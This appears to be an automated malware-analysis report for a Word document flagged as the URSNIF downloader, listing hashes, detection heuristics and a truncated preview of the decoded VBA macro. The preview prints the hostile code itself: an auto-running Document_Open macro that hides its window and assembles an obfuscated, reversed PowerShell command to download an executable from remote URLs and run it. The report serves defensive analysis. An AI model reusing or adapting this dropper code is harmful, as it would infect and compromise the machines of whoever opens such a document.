Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 81ea956fa6739a15…

MALICIOUS

Office (OLE)

74.9 KB Created: 2018-09-11 21:22:00 Authoring application: Microsoft Office Word First seen: 2019-02-10
MD5: ec2f71d89bd414d1779891b4e0db3cac SHA-1: 5c3b353439488a37a9d74f6257111eae3b3384bf SHA-256: 81ea956fa6739a15975cd95abdb1a7986a7d664dfaa53cbe271a7b5fd1036edb
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with a Document_Open subroutine that utilizes the Shell() function to execute commands. The macro appears to be constructing a command line for execution, likely to download and run a secondary payload. ClamAV identifies this as URSNIF, a known downloader family. The embedded URL is benign, but the macro's intent is clear.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6605 bytes
SHA-256: b17fdee486422cac3d1a1adf4248b98b6baf2eb3c3c76caad8d9bdc322feda52
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "RwRnmpSqNVm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   VarType "rzAfXb" + "ui" + "hD" + "i"
   VarType "w" + "490673515" + "255797478" + "485032151"
   VarType "174309526" + "ijBPan"
   VarType "b" + "Sc" + "Tj" + "292884507"
   VarType "TnqJafcPPTPRi" + "zrY" + "qhZr" + "WofMnKjVQCMf"
Shell NJrIzis + kthrTOEdO + CfvAwO, Format(vbHide)
   VarType "9432" + "195024788"
   VarType "f" + "dfv"
   VarType "285956793" + "FV"
   VarType "187433196" + "XN"
   VarType "72554802" + "DTbwT" + "uT" + "111752215"
End Sub



Attribute VB_Name = "wwPWBwEDkUu"
Function NJrIzis()

On _
Error _
Resume _
Next
VarType "znvvv" + "7512" + "531526858" + "IjSXm"
   VarType "QSAJsRBCiG" + "bjX"
   VarType "fwiB" + "JcMkwYtzC"
   VarType "7286" + "OMa" + "3850" + "zbM"
   VarType "auWYMJJNNU" + "OwkA" + "TaQwYqwzf" + "HLo"
arNbG = Format(Chr(9 + 8 + 9 + 18 + 55)) + "m" + "d /V:/" + Format(Chr(6 + 5 + 6 + 12 + 38)) + Format(Chr(2 + 2 + 3 + 5 + 22)) + "s^e" + "^"
VarType "GqoY" + "413751772" + "tHDbHrcwb" + "RD"
   VarType "3375" + "jXXkEVlwOAamNm" + "186494586" + "o"
WnOLtNJ = "t" + " 3^0^4=" + " " + "^ ^ " + "^  ^" + " "
VarType "425455560" + "392447331" + "9744" + "N"
   VarType "U" + "kQm"
iinctdircfl = "^  ^ " + " ^ ^ " + "  ^   " + "^}^}" + "{h" + Format(Chr(9 + 8 + 9 + 18 + 55)) + "^t" + "a" + Format(Chr(9 + 8 + 9 + 18 + 55)) + "}" + ";k^"
VarType "1386" + "hXVNd" + "jF" + "CIu"
   VarType "A" + "ipwnzL"
sIkltsvZMjQ = "aer^b^" + ";" + "^w^EF" + "^$^ ^me" + "^" + "tI^-e^" + "k^o" + "vn" + "I;" + ")^w" + "E^" + "F$^ ,^t"
VarType "Y" + "9494" + "17112871" + "M"
   VarType "439877225" + "307654364"
   VarType "iVzn" + "DQAJkF"
zvnScOWdSwz = "^E^L$" + "(^eli" + "^Fd" + "^a^o^l" + "n" + "^woD^.Y" + "^lw^" + "$^{" + "^yrt^{" + ")"
VarType "143403302" + "2802"
hWifUOS = "^FnR$^" + " ni " + "^tEL^$(" + "^h" + Format(Chr(9 + 8 + 9 + 18 + 55)) + "^" + "a^er^of" + ";^" + "'^ex^e" + ".^'" + "^" + "+Q" + "^zD$+^'"
VarType "o" + "zj"
   VarType "vGjzFdjMizp" + "Y" + "5662" + "HlCkC"
   VarType "w" + "49391447" + "9544" + "5665"
   VarType "RKP" + "zTLbVWs" + "FM" + "8773"
SXDISGMP = "^" + "\^'+" + Format(Chr(9 + 8 + 9 + 18 + 55)) + "^i" + "lbu^p^:" + "vne$" + "^=" + "w^E^F$^" + ";^" + "'" + "^2^0^8^" + "'^ ^= " + "^Q^z"
NJrIzis = arNbG + WnOLtNJ + iinctdircfl + sIkltsvZMjQ + zvnScOWdSwz + hWifUOS + SXDISGMP
   VarType "109026521" + "GQUGTwDpatVvKi"
   VarType "UnwaUV" + "201" + "hkHvlQhhc" + "99981430"
   VarType "ZjSz" + "iMJ" + "Q" + "dc"
   VarType "4463" + "X"
End Function
Function kthrTOEdO()

On _
Error _
Resume _
Next
VarType "I" + "wN" + "iwhpPww" + "8983571"
   VarType "nSdWP" + "454234424"
zfspwk = "D$^;)^'" + "^@'(t" + "^i^l^p" + "S.^" + "'^B" + "H^8XJ^" + "i^sk/" + "^mo" + Format(Chr(9 + 8 + 9 + 18 + 55)) + "^" + "." + "vrt^-ai" + "^gr^"
VarType "BX" + "vAMowM"
   VarType "3231" + "DYic" + "lttDbrwCP" + "356106530"
   VarType "312668124" + "f" + "Xr" + "5621"
   VarType "5086" + "mVYdjG" + "wShchMBJ" + "502956126"
MSQzEKNLM = "o^e^g/" + "/:" + "p^" + "t" + "t^h^@" + "^fkX^F4"
VarType "6039" + "dfpr"
   VarType "YiwwiHw" + "814" + "vHhdDI" + "GSvI"
   VarType "463420084" + "UvKHqlk" + "231188923" + "SMKabuRrmlKHZ"
   VarType "mw" + "iMPzTv"
   VarType "7402" + "USDFIkf" + "dfBBPSB" + "1357"
HVAfP = "P^" + "E5U" + "4/TN^E" + "MY^" + "AP/^O^E" + "^548^6/" + "^mo" + Format(Chr(9 + 8 + 9 + 18 + 55)) + "." + "^db^g" + "n^it" + "^s" + "^o^hev"
VarType "GaXGvwWtApDiop" + "VLkduWCb" + "dO" + "Jzh"
   VarType "4480" + "SM"
EwqiJYXQcH = "^il.r^e" + "vr^" + "es" + "//^:^p^" + "t^t" + "^h^" + "@VvR"
VarType "1604" + "iAVqR"
   VarType "5571" + "7236"
   VarType "EFc" + "VuKiPIlU"
   VarType "riD" + "uovo" + "258712479" + "476822968"
   VarType "bEwJcjQMvS" + "427305951" + "vQbpbH" + "53040335
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.